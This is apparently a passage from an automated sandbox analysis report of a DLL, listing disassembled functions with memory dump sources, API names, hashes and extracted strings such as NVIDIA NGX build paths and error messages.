                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: dd8ee555a69306320eebe891d200e187e02fda6655238bb9e5ba11fcf8265f6f
                                                                                                                                  • Instruction ID: 221a0a431d4840492094c7f9c17d98f7aaeac0dab3ea44899dede8972f580f3a
                                                                                                                                  • Opcode Fuzzy Hash: dd8ee555a69306320eebe891d200e187e02fda6655238bb9e5ba11fcf8265f6f
                                                                                                                                  • Instruction Fuzzy Hash: 0D41F534B59BC391F6749F95BCB81B433ACBF48751BD84238D89DE66608FBC61A0B204
                                                                                                                                  Function 00007FFD92DB3D70 Relevance: 9.1, APIs: 6, Instructions: 66processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$Free$AllocCreateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1969510515-0
                                                                                                                                  • Opcode ID: 12740f08b17e158aafcf8b993e97012b1c5048d0ee68dbad3ebb90abe51118b6
                                                                                                                                  • Instruction ID: da76caac07fd24083997f501050f38b1d74d902822facf9f3f527d46eb0a86c1
                                                                                                                                  • Opcode Fuzzy Hash: 12740f08b17e158aafcf8b993e97012b1c5048d0ee68dbad3ebb90abe51118b6
                                                                                                                                  • Instruction Fuzzy Hash: 6A212D76708B818AE6749F96B89026AB7A4BB89BD0F044138EE8D47F19DE3DD0518B00
                                                                                                                                  Function 00007FFD92DB48E0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 162COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide
                                                                                                                                  • String ID: C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$WStrToUTF8Str$WStrToUTF8Str : WideCharToMultiByte failed
                                                                                                                                  • API String ID: 626452242-1232079533
                                                                                                                                  • Opcode ID: 00bc28277f8e413848cc3c53caacea19eefad3600e0077b83c526978867c428e
                                                                                                                                  • Instruction ID: f914bd395932aa634f0aac4d9c582646ed57356340968339c2ff4efaf8e17158
                                                                                                                                  • Opcode Fuzzy Hash: 00bc28277f8e413848cc3c53caacea19eefad3600e0077b83c526978867c428e
                                                                                                                                  • Instruction Fuzzy Hash: 3C61BE22B08B4285FB24DFA1E8A03B823A5FB04BA9F545239DE6D17AD5CF7D9511D340
                                                                                                                                  Function 0000000180034034 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale_invoke_watson$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_call_reportfault_getptd_malloc_crt
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 1584724053-336475711
                                                                                                                                  • Opcode ID: 604a302fabdb042f4ebc9b27cedb385bdeaebfe8a2c90ea295b00d5b5a1e0000
                                                                                                                                  • Instruction ID: 6d0e94c2461dd84b0edd1b1838a9f5cfcbcc86ad0ff0a6976e9d1f2ec4836e13
                                                                                                                                  • Opcode Fuzzy Hash: 604a302fabdb042f4ebc9b27cedb385bdeaebfe8a2c90ea295b00d5b5a1e0000
                                                                                                                                  • Instruction Fuzzy Hash: 5C41D032320B4881EB46DF26A8053DE63A5FB88BC4F4AD025EF5D4B785DE38D616C304
                                                                                                                                  Function 00000001800311AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _getptd$ExceptionRaise_amsg_exit_getptd_noexit
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2951875022-1018135373
                                                                                                                                  • Opcode ID: 19bc60ab7c8d46f879a577fdbd2134b4bea23403eb8b854014e227e093e25ad5
                                                                                                                                  • Instruction ID: cbf58d6bb5dae3ded25f47af1c64b690f48564a0522dc2334fd63855ea109656
                                                                                                                                  • Opcode Fuzzy Hash: 19bc60ab7c8d46f879a577fdbd2134b4bea23403eb8b854014e227e093e25ad5
                                                                                                                                  • Instruction Fuzzy Hash: D52101362046888AE6B2DF56E0407EFB760F78DBA5F058216EF9943795CF38D689C701
                                                                                                                                  Function 00007FFD92DC5E50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressProc
                                                                                                                                  • String ID: Shell32.dll$ShellExecuteExW
                                                                                                                                  • API String ID: 1975335638-1867648532
                                                                                                                                  • Opcode ID: fb2c20d02fc5ce01f6fbea5abba0739a854b0586ab376f0aa36309c75b8c1e82
                                                                                                                                  • Instruction ID: efa1c00cb57bcb84d467dd9ee16f96434f70c14b85828ff537881385e7676853
                                                                                                                                  • Opcode Fuzzy Hash: fb2c20d02fc5ce01f6fbea5abba0739a854b0586ab376f0aa36309c75b8c1e82
                                                                                                                                  • Instruction Fuzzy Hash: 761191A5B09A4682FF79CFD6F9A013512A9AF48BC5F089138D90D8BB65EE6CE450D300
                                                                                                                                  Function 00007FFD92DB1230 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeTask
                                                                                                                                  • String ID: C:\dvs\p4\build\sw\devrel\libdev\NGX\core\r1.2\source\api\nvsdk_ngx_common.cpp$NGXGetPath$\NVIDIA\NGX\models\$error: NGXGetPath failed to obtain path to models
                                                                                                                                  • API String ID: 734271698-558388089
                                                                                                                                  • Opcode ID: cf7afd06313f23bc2d3ce6267aed7f858da56ded38a386cad9cd68212315a593
                                                                                                                                  • Instruction ID: 9e28b2cc695a4f479dbac43bd49919f9f73bbe9e4492c74f01b04369d71065c4
                                                                                                                                  • Opcode Fuzzy Hash: cf7afd06313f23bc2d3ce6267aed7f858da56ded38a386cad9cd68212315a593
                                                                                                                                  • Instruction Fuzzy Hash: 2D0186A1F18A4691FB24DFE1F8603F61314EF89785F842431E90E57A91DE7CE185D750
                                                                                                                                  Function 00007FFD92DBA8F0 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1775632426-0
                                                                                                                                  • Opcode ID: 8158fdbed35703439d31d863770e95fddfec0e87a7ccd3433e7dff91f6b0f40e
                                                                                                                                  • Instruction ID: 8886053fca597d44264903d88803d139117f08c336a5ea2a483f1ef60d43a0e3
                                                                                                                                  • Opcode Fuzzy Hash: 8158fdbed35703439d31d863770e95fddfec0e87a7ccd3433e7dff91f6b0f40e
                                                                                                                                  • Instruction Fuzzy Hash: 8691B562F0868245FB718FA294603B966A1EF42BA5F484731DA6D47BC9DFFCE44D8340
                                                                                                                                  Function 0000000180038C3C Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2998201375-0
                                                                                                                                  • Opcode ID: ce750271998e25300b2e646f02fc7aaebec70d68116cdf7c58e233941e4e38ee
                                                                                                                                  • Instruction ID: 54a50374dbd1f0619f5f0edc3d7c0374764c2683045a736cdbb11a7d2bf11c8c
                                                                                                                                  • Opcode Fuzzy Hash: ce750271998e25300b2e646f02fc7aaebec70d68116cdf7c58e233941e4e38ee
                                                                                                                                  • Instruction Fuzzy Hash: D841E53221578486E7A38F15E1403AAB7A1FF99FC0F199165FB8857BD9CF38C6458700
                                                                                                                                  Function 000000018002FC18 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3669027769-0
                                                                                                                                  • Opcode ID: d84545b744132abf258f2739307021ab7867776e2950de2c885c0764620f8872
                                                                                                                                  • Instruction ID: 484109b601cdb60bdd28eb5de1a6cf464c0836e84c8d7e2c0ed591a5095a7b89
                                                                                                                                  • Opcode Fuzzy Hash: d84545b744132abf258f2739307021ab7867776e2950de2c885c0764620f8872
                                                                                                                                  • Instruction Fuzzy Hash: E5F0FE322086CCC1EAE7AB55D2413FD5350AB8DBC4F1DC171BB840738B9E20C6989315
                                                                                                                                  Function 00000001800039C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 200COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: string too long
                                                                                                                                  • API String ID: 0-2556327735
                                                                                                                                  • Opcode ID: d80f9fc73ac2c0aa56d40fc8d5a718c0a56552a0bad6d3397c00ff315f2492a8
                                                                                                                                  • Instruction ID: 4d068781c1a08710b22694d90911747276d76f42a382d111b7b34a5d35fe3e91
                                                                                                                                  • Opcode Fuzzy Hash: d80f9fc73ac2c0aa56d40fc8d5a718c0a56552a0bad6d3397c00ff315f2492a8
                                                                                                                                  • Instruction Fuzzy Hash: CC919D72300B8899EB56CF66C0417EC33A5F319B98F818922EB5D67B99DF34CA59C310
                                                                                                                                  Function 00007FFD92DC50C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EmptyRect
                                                                                                                                  • String ID: %s - Cannot allocate CNvMediaStream object$CNvMediaStream::createInstance
                                                                                                                                  • API String ID: 2270935405-2132362898
                                                                                                                                  • Opcode ID: 1909a5ec3928abb6569e16f3c136be8b54ff892250961ddcd135eeaa0d9569e6
                                                                                                                                  • Instruction ID: 73faf0c22fcb717a01b75635e397a93b4368c1e9f8ef3a03b35d3bfd50405896
                                                                                                                                  • Opcode Fuzzy Hash: 1909a5ec3928abb6569e16f3c136be8b54ff892250961ddcd135eeaa0d9569e6
                                                                                                                                  • Instruction Fuzzy Hash: 8951B532B08F8181E710CF66E8501A9B3A8FF88B88F488235CE9D57799EF78D155C750
                                                                                                                                  Function 00007FFD92DB1B00 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
